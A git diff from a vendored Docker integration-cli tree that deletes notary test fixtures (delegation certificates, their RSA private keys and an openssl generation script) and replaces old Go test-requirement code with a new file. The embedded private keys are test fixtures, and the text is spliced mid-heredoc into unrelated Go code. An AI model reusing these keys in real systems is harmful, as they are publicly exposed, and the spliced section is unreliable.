file mode 100644 index 2218f23c89..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.crt +++ /dev/null @@ -1,21 +0,0 @@ ------BEGIN CERTIFICATE----- -MIIDhTCCAm2gAwIBAgIJAP2EcMN2UXPcMA0GCSqGSIb3DQEBCwUAMFcxCzAJBgNV -BAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMQ8wDQYD -VQQKEwZEb2NrZXIxEzARBgNVBAMTCmRlbGVnYXRpb24wHhcNMTYwOTI4MTc0ODQ4 -WhcNMjYwNjI4MTc0ODQ4WjBXMQswCQYDVQQGEwJVUzELMAkGA1UECBMCQ0ExFTAT 
-BgNVBAcTDFNhbkZyYW5jaXNjbzEPMA0GA1UEChMGRG9ja2VyMRMwEQYDVQQDEwpk -ZWxlZ2F0aW9uMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvgewhaYs -Ke5s2AM7xxKrT4A6n7hW17qSnBjonCcPcwTFmYqIOdxWjYITgJuHrTwB4ZhBqWS7 -tTsUUu6hWLMeB7Uo5/GEQAAZspKkT9G/rNKF9lbWK9PPhGGkeR01c/Q932m92Hsn -fCQ0Pp/OzD3nVTh0v9HKk+PObNMOCcqG87eYs4ylPRxs0RrE/rP+bEGssKQSbeCZ -wazDnO+kiatVgKQZ2CK23iFdRE1z2rzqVDeaFWdvBqrRdWnkOZClhlLgEQ5nK2yV -B6tSqOiI3MmHyHzIkGOQJp2/s7Pe0ckEkzsjTsJW8oKHlBBl6pRxHIKzNN4VFbeB -vvYvrogrDrC/owIDAQABo1QwUjAMBgNVHRMBAf8EAjAAMA4GA1UdDwEB/wQEAwIF -oDATBgNVHSUEDDAKBggrBgEFBQcDAzAdBgNVHQ4EFgQUFoHfukRa6qGk1ncON64Z -ASKlZdkwDQYJKoZIhvcNAQELBQADggEBAEq9Adpd03CPmpbRtTAJGAkjjLFr60sV -2r+/l/m9R31ZCN9ymM9nxToQ8zfMdeAh/nnPcErziil2gDVqXueCNDkRj09tmDIE -Q1Oc92uyNZNgcECow77cKZCTZSTku+qsJrYaykH5vSnia8ltcKj8inJedIcpBR+p -608HEQvF0Eg5eaLPJwH48BCb0Gqdri1dJgrNnqptz7MDr8M+u7tHVulbAd3YxLlq -JH1W2bkVUx6esbn/MUE5HL5iTuOYREEINvBSmLdmmFkampmCnCB/bDEyJeL9bAkt -ZPIi0UNSnqFKLSP1Vf8AGLXt6iO7+1OGvtsDXEEYdXVOMsSXZtUuT7A= ------END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.key b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.key deleted file mode 100644 index cb37efc94a..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.key +++ /dev/null @@ -1,27 +0,0 @@ ------BEGIN RSA PRIVATE KEY----- -MIIEpAIBAAKCAQEAvgewhaYsKe5s2AM7xxKrT4A6n7hW17qSnBjonCcPcwTFmYqI -OdxWjYITgJuHrTwB4ZhBqWS7tTsUUu6hWLMeB7Uo5/GEQAAZspKkT9G/rNKF9lbW -K9PPhGGkeR01c/Q932m92HsnfCQ0Pp/OzD3nVTh0v9HKk+PObNMOCcqG87eYs4yl -PRxs0RrE/rP+bEGssKQSbeCZwazDnO+kiatVgKQZ2CK23iFdRE1z2rzqVDeaFWdv -BqrRdWnkOZClhlLgEQ5nK2yVB6tSqOiI3MmHyHzIkGOQJp2/s7Pe0ckEkzsjTsJW -8oKHlBBl6pRxHIKzNN4VFbeBvvYvrogrDrC/owIDAQABAoIBAB/o8KZwsgfUhqh7 -WoViSCwQb0e0z7hoFwhpUl4uXPTGf1v6HEgDDPG0PwwgkdbwNaypQZVtWevj4NTQ -R326jjdjH1xbfQa2PZpz722L3jDqJR6plEtFxRoIv3KrCffPsrgabIu2mnnJJpDB -ixtW5cq0sT4ov2i4H0i85CWWwbSY/G/MHsvCuK9PhoCj9uToVqrf1KrAESE5q4fh 
-mPSYUL99KVnj7SZkUz+79rc8sLLPVks3szZACMlm1n05ZTj/d6Nd2ZZUO45DllIj -1XJghfWmnChrB/P/KYXgQ3Y9BofIAw1ra2y3wOZeqRFNsbmojcGldfdtN/iQzhEj -uk4ThokCgYEA9FTmv36N8qSPWuqX/KzkixDQ8WrDGohcB54kK98Wx4ijXx3i38SY -tFjO8YUS9GVo1+UgmRjZbzVX7xeum6+TdBBwOjNOxEQ4tzwiQBWDdGpli8BccdJ2 -OOIVxSslWhiUWfpYloXVetrR88iHbT882g795pbonDaJdXSLnij4UW8CgYEAxxrr -QFpsmOEZvI/yPSOGdG7A1RIsCeH+cEOf4cKghs7+aCtAHlIweztNOrqirl3oKI1r -I0zQl46WsaW8S/y99v9lmmnZbWwqLa4vIu0NWs0zaZdzKZw3xljMhgp4Ge69hHa2 -utCtAxcX+7q/yLlHoTiYwKdxX54iLkheCB8csw0CgYEAleEG820kkjXUIodJ2JwO -Tihwo8dEC6CeI6YktizRgnEVFqH0rCOjMO5Rc+KX8AfNOrK5PnD54LguSuKSH7qi -j04OKgWTSd43lF90+y63RtCFnibQDpp2HwrBJAQFk7EEP/XMJfnPLN/SbuMSADgM -kg8kPTFRW5Iw3DYz9z9WpE0CgYAkn6/8Q2XMbUOFqti9JEa8Lg8sYk5VdwuNbPMA -3QMYKQUk9ieyLB4c3Nik3+XCuyVUKEc31A5egmz3umu7cn8i6vGuiJ/k/8t2YZ7s -Bry5Ihu95Yzab5DW3Eiqs0xKQN79ebS9AluAwQO5Wy2h52rknfuDHIm/M+BHsSoS -xl5KFQKBgQCokCsYuX1z2GojHw369/R2aX3ovCGuHqy4k7fWxUrpHTHvth2+qNPr -84qLJ9rLWoZE5sUiZ5YdwCgW877EdfkT+v4aaBX79ixso5VdqgJ/PdnoNntah/Vq -njQiW1skn6/P5V/eyimN2n0VsyBr/zMDEtYTRP/Tb1zi/njFLQkZEA== ------END RSA PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.crt b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.crt deleted file mode 100644 index bec084790a..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.crt +++ /dev/null @@ -1,21 +0,0 @@ ------BEGIN CERTIFICATE----- -MIIDhTCCAm2gAwIBAgIJAIq8naKlYAQfMA0GCSqGSIb3DQEBCwUAMFcxCzAJBgNV -BAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMQ8wDQYD -VQQKEwZEb2NrZXIxEzARBgNVBAMTCmRlbGVnYXRpb24wHhcNMTYwOTI4MTc0ODQ4 -WhcNMjYwNjI4MTc0ODQ4WjBXMQswCQYDVQQGEwJVUzELMAkGA1UECBMCQ0ExFTAT -BgNVBAcTDFNhbkZyYW5jaXNjbzEPMA0GA1UEChMGRG9ja2VyMRMwEQYDVQQDEwpk -ZWxlZ2F0aW9uMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAyY2EWYTW -5VHipw08t675upmD6a+akiuZ1z+XpuOxZCgjZ0aHfoOe8wGKg3Ohz7UCBdD5Mob/ -L/qvRlsCaqPHGZKIyyX1HDO4mpuQQFBhYxt+ZAO3AaawEUOw2rwwMDEjLnDDTSZM 
-z8jxCMvsJjBDqgb8g3z+AmjducQ/OH6llldgHIBY8ioRbROCL2PGgqywWq2fThav -c70YMxtKviBGDNCouYeQ8JMK/PuLwPNDXNQAagFHVARXiUv/ILHk7ImYnSGJUcuk -JTUGN2MBnpY0eakg7i+4za8sjjqOdn+2I6aVzlGJDSiRP72nkg/cE4BqMl9FrMwK -9iS8xa9yMDLUvwIDAQABo1QwUjAMBgNVHRMBAf8EAjAAMA4GA1UdDwEB/wQEAwIF -oDATBgNVHSUEDDAKBggrBgEFBQcDAzAdBgNVHQ4EFgQUvQzzFmh3Sv3HcdExY3wx -/1u6JLAwDQYJKoZIhvcNAQELBQADggEBAJcmDme2Xj/HPUPwaN/EyCmjhY73EiHO -x6Pm16tscg5JGn5A+u3CZ1DmxUYl8Hp6MaW/sWzdtL0oKJg76pynadCWh5EacFR8 -u+2GV/IcN9mSX6JQzvrqbjSqo5/FehqBD+W5h3euwwApWA3STAadYeyEfmdOA3SQ -W1vzrA1y7i8qgTqeJ7UX1sEAXlIhBK2zPYaMB+en+ZOiPyNxJYj6IDdGdD2paC9L -6H9wKC+GAUTSdCWp89HP7ETSXEGr94AXkrwU+qNsiN+OyK8ke0EMngEPh5IQoplw -/7zEZCth3oKxvR1/4S5LmTVaHI2ZlbU4q9bnY72G4tw8YQr2gcBGo4w= ------END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.key b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.key deleted file mode 100644 index 5ccabe908f..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.key +++ /dev/null @@ -1,27 +0,0 @@ ------BEGIN RSA PRIVATE KEY----- -MIIEogIBAAKCAQEAyY2EWYTW5VHipw08t675upmD6a+akiuZ1z+XpuOxZCgjZ0aH -foOe8wGKg3Ohz7UCBdD5Mob/L/qvRlsCaqPHGZKIyyX1HDO4mpuQQFBhYxt+ZAO3 -AaawEUOw2rwwMDEjLnDDTSZMz8jxCMvsJjBDqgb8g3z+AmjducQ/OH6llldgHIBY -8ioRbROCL2PGgqywWq2fThavc70YMxtKviBGDNCouYeQ8JMK/PuLwPNDXNQAagFH -VARXiUv/ILHk7ImYnSGJUcukJTUGN2MBnpY0eakg7i+4za8sjjqOdn+2I6aVzlGJ -DSiRP72nkg/cE4BqMl9FrMwK9iS8xa9yMDLUvwIDAQABAoIBAHmffvzx7ydESWwa -zcfdu26BkptiTvjjfJrqEd4wSewxWGPKqJqMXE8xX99A2KTZClZuKuH1mmnecQQY -iRXGrK9ewFMuHYGeKEiLlPlqR8ohXhyGLVm+t0JDwaXMp5t9G0i73O5iLTm5fNGd -FGxa9YnVW20Q8MqNczbVGH1D1zInhxzzOyFzBd4bBBJ8PdrUdyLpd7+RxY2ghnbT -p9ZANR2vk5zmDLJgZx72n/u+miJWuhY6p0v3Vq4z/HHgdhf+K6vpDdzTcYlA0rO4 -c/c+RKED3ZadGUD5QoLsmEN0e3FVSMPN1kt4ZRTqWfH8f2X4mLz33aBryTjktP6+ -1rX6ThECgYEA74wc1Tq23B5R0/GaMm1AK3Ko2zzTD8wK7NSCElh2dls02B+GzrEB -aE3A2GMQSuzb+EA0zkipwANBaqs3ZemH5G1pu4hstQsXCMd4jAJn0TmTXlplXBCf 
-PSc8ZUU6XcJENRr9Q7O9/TGlgahX+z0ndxYx/CMCsSu7XsMg4IZsbAcCgYEA12Vb -wKOVG15GGp7pMshr+2rQfVimARUP4gf3JnQmenktI4PfdnMW3a4L3DEHfLhIerwT -6lRp/NpxSADmuT4h1UO1l2lc+gmTVPw0Vbl6VwHpgS5Kfu4ZyM6n3S66f/dE4nu7 -hQF9yZz7vn5Agghak4p6a1wC1gdMzR1tvxFzk4kCgYByBMTskWfcWeok8Yitm+bB -R3Ar+kWT7VD97SCETusD5uG+RTNLSmEbHnc+B9kHcLo67YS0800pAeOvPBPARGnU -RmffRU5I1iB+o0MzkSmNItSMQoagTaEd4IEUyuC/I+qHRHNsOC+kRm86ycAm67LP -MhdUpe1wGxqyPjp15EXTHQKBgDKzFu+3EWfJvvKRKQ7dAh3BvKVkcl6a2Iw5l8Ej -YdM+JpPPfI/i8yTmzL/dgoem0Nii4IUtrWzo9fUe0TAVId2S/HFRSaNJEbbVTnRH -HjbQqmfPv5U08jjD+9siHp/0UfCFc1QRT8xe+RqTmReCY9+KntoaZEiAm2FEZgqt -TukRAoGAf7QqbTP5/UH1KSkX89F5qy/6GS3pw6TLj9Ufm/l/NO8Um8gag6YhEKWR -7HpkpCqjfWj8Av8ESR9cqddPGrbdqXFm9z7dCjlAd5T3Q3h/h+v+JzLQWbsI6WOb -SsOSWNyE006ZZdIiFwO6GfxpLI24sVtYKgyob6Q71oxSqfnrnT0= ------END RSA PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.crt b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.crt deleted file mode 100644 index f434b45fc8..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.crt +++ /dev/null @@ -1,21 +0,0 @@ ------BEGIN CERTIFICATE----- -MIIDhTCCAm2gAwIBAgIJAKHt/jxiWqMtMA0GCSqGSIb3DQEBCwUAMFcxCzAJBgNV -BAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMQ8wDQYD -VQQKEwZEb2NrZXIxEzARBgNVBAMTCmRlbGVnYXRpb24wHhcNMTYwOTI4MTc0ODQ5 -WhcNMjYwNjI4MTc0ODQ5WjBXMQswCQYDVQQGEwJVUzELMAkGA1UECBMCQ0ExFTAT -BgNVBAcTDFNhbkZyYW5jaXNjbzEPMA0GA1UEChMGRG9ja2VyMRMwEQYDVQQDEwpk -ZWxlZ2F0aW9uMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqfbJk2Dk -C9FJVjV2+Q2CQrJphG3vFc1Qlu9jgVA5RhGmF9jJzetsclsV/95nBhinIGcSmPQA -l318G7Bz/cG/6O2n5+hj+S1+YOvQweReZj3d4kCeS86SOyLNTpMD9gsF0S8nR1RN -h0jD4t1vxAVeGD1o61U8/k0O5eDoeOfOSWZagKk5PhyrMZgNip4IrG46umCkFlrw -zMMcgQdwTQXywPqkr/LmYpqT1WpMlzHYTQEY8rKorIJQbPtHVYdr4UxYnNmk6fbU -biEP1DQlwjBWcFTsDLqXKP/K+e3O0/e/hMB0y7Tj9fZ7Viw0t5IKXZPsxMhwknUT -9vmPzIJO6NiniwIDAQABo1QwUjAMBgNVHRMBAf8EAjAAMA4GA1UdDwEB/wQEAwIF 
-oDATBgNVHSUEDDAKBggrBgEFBQcDAzAdBgNVHQ4EFgQUdTXRP1EzxQ+UDZSoheVo -Mobud1cwDQYJKoZIhvcNAQELBQADggEBADV9asTWWdbmpkeRuKyi0xGho39ONK88 -xxkFlco766BVgemo/rGQj3oPuw6M6SzHFoJ6JUPjmLiAQDIGEU/2/b6LcOuLjP+4 -YejCcDTY3lSW/HMNoAmzr2foo/LngNGfe/qhVFUqV7GjFT9+XzFFBfIZ1cQiL2ed -kc8rgQxFPwWXFCSwaENWeFnMDugkd+7xanoAHq8GsJpg5fTruDTmJkUqC2RNiMLn -WM7QaqW7+lmUnMnc1IBoz0hFhgoiadWM/1RQxx51zTVw6Au1koIm4ZXu5a+/WyC8 -K1+HyUbc0AVaDaRBpRSOR9aHRwLGh6WQ4aUZQNyJroc999qfYrDEEV8= ------END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.key b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.key deleted file mode 100644 index a61d18cc3d..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.key +++ /dev/null @@ -1,27 +0,0 @@ ------BEGIN RSA PRIVATE KEY----- -MIIEpQIBAAKCAQEAqfbJk2DkC9FJVjV2+Q2CQrJphG3vFc1Qlu9jgVA5RhGmF9jJ -zetsclsV/95nBhinIGcSmPQAl318G7Bz/cG/6O2n5+hj+S1+YOvQweReZj3d4kCe -S86SOyLNTpMD9gsF0S8nR1RNh0jD4t1vxAVeGD1o61U8/k0O5eDoeOfOSWZagKk5 -PhyrMZgNip4IrG46umCkFlrwzMMcgQdwTQXywPqkr/LmYpqT1WpMlzHYTQEY8rKo -rIJQbPtHVYdr4UxYnNmk6fbUbiEP1DQlwjBWcFTsDLqXKP/K+e3O0/e/hMB0y7Tj -9fZ7Viw0t5IKXZPsxMhwknUT9vmPzIJO6NiniwIDAQABAoIBAQCAr/ed3A2umO7T -FDYZik3nXBiiiW4t7r+nGGgZ3/kNgY1lnuHlROxehXLZwbX1mrLnyML/BjhwezV9 -7ZNVPd6laVPpNj6DyxtWHRZ5yARlm1Al39E7CpQTrF0QsiWcpGnqIa62xjDRTpnq -askV/Q5qggyvqmE9FnFCQpEiAjlhvp7F0kVHVJm9s3MK3zSyR0UTZ3cpYus2Jr2z -OotHgAMHq5Hgb3dvxOeE2xRMeYAVDujbkNzXm2SddAtiRdLhWDh7JIr3zXhp0HyN -4rLOyhlgz00oIGeDt/C0q3fRmghr3iZOG+7m2sUx0FD1Ru1dI9v2A+jYmIVNW6+x -YJk5PzxJAoGBANDj7AGdcHSci/LDBPoTTUiz3uucAd27/IJma/iy8mdbVfOAb0Fy -PRSPvoozlpZyOxg2J4eH/o4QxQR4lVKtnLKZLNHK2tg3LarwyBX1LiI3vVlB+DT1 -AmV8i5bJAckDhqFeEH5qdWZFi03oZsSXWEqX5iMYCrdK5lTZggcrFZeHAoGBANBL -fkk3knAdcVfTYpmHx18GBi2AsCWTd20KD49YBdbVy0Y2Jaa1EJAmGWpTUKdYx40R -H5CuGgcAviXQz3bugdTU1I3tAclBtpJNU7JkhuE+Epz0CM/6WERJrE0YxcGQA5ui -6fOguFyiXD1/85jrDBOKy74aoS7lYz9r/a6eqmjdAoGBAJpm/nmrIAZx+Ff2ouUe 
-A1Ar9Ch/Zjm5zEmu3zwzOU4AiyWz14iuoktifNq2iyalRNz+mnVpplToPFizsNwu -C9dPtXtU0DJlhtIFrD/evLz6KnGhe4/ZUm4lgyBvb2xfuNHqL5Lhqelwmil6EQxb -Oh3Y7XkfOjyFln89TwlxZUJdAoGAJRMa4kta7EvBTeGZLjyltvsqhFTghX+vBSCC -ToBbYbbiHJgssXSPAylU4sD7nR3HPwuqM6VZip+OOMrm8oNXZpuPTce+xqTEq1vK -JvmPrG3RAFDLdMFZjqYSXhKnuGE60yv3Ol8EEbDwfB3XLQPBPYU56Jdy0xcPSE2f -dMJXEJ0CgYEAisZw0nXw6lFeYecu642EGuU0wv1O9i21p7eho9QwOcsoTl4Q9l+M -M8iBv+qTHO+D19l4JbkGvy2H2diKoYduUFACcuiFYs8fjrT+4Z6DyOQAQGAf6Ylw -BFbU15k6KbA9v4mZDfd1tY9x62L/XO55ZxYG+J+q0e26tEThgD8cEog= ------END RSA PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.crt b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.crt deleted file mode 100644 index c8cbe46bdf..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.crt +++ /dev/null @@ -1,21 +0,0 @@ ------BEGIN CERTIFICATE----- -MIIDhTCCAm2gAwIBAgIJANae++ZkUEWMMA0GCSqGSIb3DQEBCwUAMFcxCzAJBgNV -BAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMQ8wDQYD -VQQKEwZEb2NrZXIxEzARBgNVBAMTCmRlbGVnYXRpb24wHhcNMTYwOTI4MTc0ODQ5 -WhcNMjYwNjI4MTc0ODQ5WjBXMQswCQYDVQQGEwJVUzELMAkGA1UECBMCQ0ExFTAT -BgNVBAcTDFNhbkZyYW5jaXNjbzEPMA0GA1UEChMGRG9ja2VyMRMwEQYDVQQDEwpk -ZWxlZ2F0aW9uMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqULAjgba -Y2I10WfqdmYnPfEqEe6iMDbzcgECb2xKafXcI4ltkQj1iO4zBTs0Ft9EzXFc5ZBh -pTjZrL6vrIa0y/CH2BiIHBJ0wRHx/40HXp4DSj3HZpVOlEMI3npRfBGNIBllUaRN -PWG7zL7DcKMIepBfPXyjBsxzH3yNiISq0W5hSiy+ImhSo3aipJUHHcp9Z9NgvpNC -3QvnxsGKRnECmDRDlxkq+FQu9Iqs/HWFYWgyfcsw+YTrWZq3qVnnqUouHO//c9PG -Ry3sZSDU97MwvkjvWys1e01Xvd3AbHx08YAsxih58i/OBKe81eD9NuZDP2KrjTxI -5xkXKhj6DV2NnQIDAQABo1QwUjAMBgNVHRMBAf8EAjAAMA4GA1UdDwEB/wQEAwIF -oDATBgNVHSUEDDAKBggrBgEFBQcDAzAdBgNVHQ4EFgQUDt95hiqbQvi0KcvZGAUu -VisnztQwDQYJKoZIhvcNAQELBQADggEBAGi7qHai7MWbfeu6SlXhzIP3AIMa8TMi -lp/+mvPUFPswIVqYJ71MAN8uA7CTH3z50a2vYupGeOEtZqVJeRf+xgOEpwycncxp -Qz6wc6TWPVIoT5q1Hqxw1RD2MyKL+Y+QBDYwFxFkthpDMlX48I9frcqoJUWFxBF2 
-lnRr/cE7BbPE3sMbXV3wGPlH7+eUf+CgzXJo2HB6THzagyEgNrDiz/0rCQa1ipFd -mNU3D/U6BFGmJNxhvSOtXX9escg8yjr05YwwzokHS2K4jE0ZuJPBd50C/Rvo3Mf4 -0h7/2Q95e7d42zPe9WYPu2F8KTWsf4r+6ddhKrKhYzXIcTAfHIOiO+U= ------END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.key b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.key deleted file mode 100644 index f473cc495a..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.key +++ /dev/null @@ -1,27 +0,0 @@ ------BEGIN RSA PRIVATE KEY----- -MIIEpAIBAAKCAQEAqULAjgbaY2I10WfqdmYnPfEqEe6iMDbzcgECb2xKafXcI4lt -kQj1iO4zBTs0Ft9EzXFc5ZBhpTjZrL6vrIa0y/CH2BiIHBJ0wRHx/40HXp4DSj3H -ZpVOlEMI3npRfBGNIBllUaRNPWG7zL7DcKMIepBfPXyjBsxzH3yNiISq0W5hSiy+ -ImhSo3aipJUHHcp9Z9NgvpNC3QvnxsGKRnECmDRDlxkq+FQu9Iqs/HWFYWgyfcsw -+YTrWZq3qVnnqUouHO//c9PGRy3sZSDU97MwvkjvWys1e01Xvd3AbHx08YAsxih5 -8i/OBKe81eD9NuZDP2KrjTxI5xkXKhj6DV2NnQIDAQABAoIBAGK0ZKnuYSiXux60 -5MvK4pOCsa/nY3mOcgVHhW4IzpRgJdIrcFOlz9ncXrBsSAIWjX7o3u2Ydvjs4DOW -t8d6frB3QiDInYcRVDjLCD6otWV97Bk9Ua0G4N4hAWkMF7ysV4oihS1JDSoAdo39 -qOdki6s9yeyHZGKwk2oHLlowU5TxQMBA8DHmxqBII1HTm+8xRz45bcEqRXydYSUn -P1JuSU9jFqdylxU+Nrq6ehslMQ3y7qNWQyiLGxu6EmR+vgrzSU0s3iAOqCHthaOS -VBBXPL3DNEYUS+0QGnGrACuJhanOMBfdiO6Orelx6ZzWZm38PNGv0yBt0WCM+8/A -TtQNGkECgYEA1LqR6AH9XikUQ0+rM4526BgVuYqtjw21h4Lj9alaA+YTQntBBJOv -iAcUpnJiV4T8jzAMLeqpK8R/rbxRnK5S9jOV2gr+puk4L6tH46cgahBUESDigDp8 -6vK8ur6ubBcXNPh3AT6rsPj+Ph2EU3raqiYdouvCdga/OCYZb+jr6UkCgYEAy7Cr -l8WssI/8/ORcQ4MFJFNyfz/Y2beNXyLd1PX0H+wRSiGcKzeUuTHNtzFFpMbrK/nx -ZOPCT2ROdHsBHzp1L+WquCb0fyMVSiYiXBU+VCFDbUU5tBr3ycTc7VwuFPENOiha -IdlWgew/aW110FQHIaqe9g+htRe+mXe++faZtbUCgYB/MSJmNzJX53XvHSZ/CBJ+ -iVAMBSfq3caJRLCqRNzGcf1YBbwFUYxlZ95n+wJj0+byckcF+UW3HqE8rtmZNf3y -qTtTCLnj8JQgpGeybU4LPMIXD7N9+fqQvBwuCC7gABpnGJyHCQK9KNNTLnDdPRqb -G3ki3ZYC3dvdZaJV8E2FyQKBgQCMa5Mf4kqWvezueo+QizZ0QILibqWUEhIH0AWV -1qkhiKCytlDvCjYhJdBnxjP40Jk3i+t6XfmKud/MNTAk0ywOhQoYQeKz8v+uSnPN 
-f2ekn/nXzq1lGGJSWsDjcXTjQvqXaVIZm7cjgjaE+80IfaUc9H75qvUT3vaq3f5u -XC7DMQKBgQDMAzCCpWlEPbZoFMl6F49+7jG0/TiqM/WRUSQnNtufPMbrR9Je4QM1 -L1UCANCPaHFOncKYer15NfIV1ctt5MZKImevDsUaQO8CUlO+dzd5H8KvHw9E29gA -B22v8k3jIjsYeRL+UJ/sBnWHgxdAe/NEM+TdlP2oP9D1gTifutPqAg== ------END RSA PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/gen.sh b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/gen.sh deleted file mode 100755 index 8d6381cec4..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/gen.sh +++ /dev/null @@ -1,18 +0,0 @@ -for selfsigned in delgkey1 delgkey2 delgkey3 delgkey4; do - subj='/C=US/ST=CA/L=SanFrancisco/O=Docker/CN=delegation' - - openssl genrsa -out "${selfsigned}.key" 2048 - openssl req -new -key "${selfsigned}.key" -out "${selfsigned}.csr" -sha256 -subj "${subj}" - cat > "${selfsigned}.cnf" < 1 && buf[0] == 'Y' - }, - "Test requires apparmor is enabled.", - } - RegistryHosting = testRequirement{ - func() bool { - // for now registry binary is built only if we're running inside - // container through `make test`. Figure that out by testing if - // registry binary is in PATH. - _, err := exec.LookPath(v2binary) - return err == nil - }, - fmt.Sprintf("Test requires an environment that can host %s in the same host", v2binary), - } - NotaryHosting = testRequirement{ - func() bool { - // for now notary binary is built only if we're running inside - // container through `make test`. Figure that out by testing if - // notary-server binary is in PATH. - _, err := exec.LookPath(notaryServerBinary) - return err == nil - }, - fmt.Sprintf("Test requires an environment that can host %s in the same host", notaryServerBinary), - } - NotaryServerHosting = testRequirement{ - func() bool { - // for now notary-server binary is built only if we're running inside - // container through `make test`. Figure that out by testing if - // notary-server binary is in PATH. 
- _, err := exec.LookPath(notaryServerBinary) - return err == nil - }, - fmt.Sprintf("Test requires an environment that can host %s in the same host", notaryServerBinary), - } - NotOverlay = testRequirement{ - func() bool { - return !strings.HasPrefix(daemonStorageDriver, "overlay") - }, - "Test requires underlying root filesystem not be backed by overlay.", - } - - Devicemapper = testRequirement{ - func() bool { - return strings.HasPrefix(daemonStorageDriver, "devicemapper") - }, - "Test requires underlying root filesystem to be backed by devicemapper.", - } - - IPv6 = testRequirement{ - func() bool { - cmd := exec.Command("test", "-f", "/proc/net/if_inet6") - - if err := cmd.Run(); err != nil { - return true - } - return false - }, - "Test requires support for IPv6", - } - UserNamespaceROMount = testRequirement{ - func() bool { - // quick case--userns not enabled in this test run - if os.Getenv("DOCKER_REMAP_ROOT") == "" { - return true - } - if _, _, err := dockerCmdWithError("run", "--rm", "--read-only", "busybox", "date"); err != nil { - return false - } - return true - }, - "Test cannot be run if user namespaces enabled but readonly mounts fail on this kernel.", - } - UserNamespaceInKernel = testRequirement{ - func() bool { - if _, err := os.Stat("/proc/self/uid_map"); os.IsNotExist(err) { - /* - * This kernel-provided file only exists if user namespaces are - * supported - */ - return false - } - - // We need extra check on redhat based distributions - if f, err := os.Open("/sys/module/user_namespace/parameters/enable"); err == nil { - defer f.Close() - b := make([]byte, 1) - _, _ = f.Read(b) - if string(b) == "N" { - return false - } - return true - } - - return true - }, - "Kernel must have user namespaces configured and enabled.", - } - NotUserNamespace = testRequirement{ - func() bool { - root := os.Getenv("DOCKER_REMAP_ROOT") - if root != "" { - return false - } - return true - }, - "Test cannot be run when remapping root", - } - IsPausable = 
testRequirement{ - func() bool { - if daemonPlatform == "windows" { - return isolation == "hyperv" - } - return true - }, - "Test requires containers are pausable.", - } - NotPausable = testRequirement{ - func() bool { - if daemonPlatform == "windows" { - return isolation == "process" - } - return false - }, - "Test requires containers are not pausable.", - } - IsolationIsHyperv = testRequirement{ - func() bool { - return daemonPlatform == "windows" && isolation == "hyperv" - }, - "Test requires a Windows daemon running default isolation mode of hyperv.", - } - IsolationIsProcess = testRequirement{ - func() bool { - return daemonPlatform == "windows" && isolation == "process" - }, - "Test requires a Windows daemon running default isolation mode of process.", - } -) - -// testRequires checks if the environment satisfies the requirements -// for the test to run or skips the tests. -func testRequires(c *check.C, requirements ...testRequirement) { - for _, r := range requirements { - if !r.Condition() { - c.Skip(r.SkipMessage) - } - } -} diff --git a/vendor/github.com/docker/docker/integration-cli/requirements_test.go b/vendor/github.com/docker/docker/integration-cli/requirements_test.go new file mode 100644 index 0000000000..28be59cd2c --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/requirements_test.go @@ -0,0 +1,219 @@ +package main + +import ( + "context" + "fmt" + "io/ioutil" + "net/http" + "os" + "os/exec" + "strconv" + "strings" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/client" + "github.com/docker/docker/integration-cli/requirement" + "github.com/docker/docker/internal/test/registry" +) + +func ArchitectureIsNot(arch string) bool { + return os.Getenv("DOCKER_ENGINE_GOARCH") != arch +} + +func DaemonIsWindows() bool { + return testEnv.OSType == "windows" +} + +func DaemonIsWindowsAtLeastBuild(buildNumber int) func() 
